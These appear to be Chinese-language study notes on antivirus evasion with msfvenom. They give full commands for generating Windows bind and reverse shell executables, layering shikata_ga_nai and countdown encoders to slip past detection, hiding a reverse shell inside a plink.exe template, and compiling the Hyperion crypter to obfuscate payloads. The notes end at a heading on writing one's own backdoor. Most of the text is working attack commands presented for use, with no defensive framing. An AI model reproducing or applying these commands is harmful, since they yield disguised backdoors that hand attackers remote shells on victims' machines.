mingw64  需要自己安装

msfvenom

strings命令，查看执行程序可读字符串

生成shell

msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 --
platform win -f exe -o a.exe

-p payload

lhost 侦听地址

lport 侦听地址

-a 操作系统架构

--platform 运行平台

-f format 输出的格式

-o

加密编码shell

msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -f raw -e
x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/
countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/
shikata_ga_nai -i 9 -b '\x00' -f exe -o a.exe

-f raw 原始格式

-e encode 加密编码

-i 加密几次

-b 过滤特殊字符

利用模板隐藏shell

plink是putty的字符界面工具

msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/
plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe

-x 指定一个模板

msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/
plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 --
platform win -f exe > b.exe

软件保护

软件开发商为保护版权，采用的混淆加密技术避免盗版逆向，常被用于免杀

Hyperion（32bit PE程序加密器）

内部软件架构

Crypter/Container

下载源代码，编译后使用

编译

cd Hyperion-1.2 && i686-w64-mingw32-g++ -static-libgcc -static-libstdc++ Src/Crypter/*.cpp -o h.exe

安装wine32

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

自己编写后门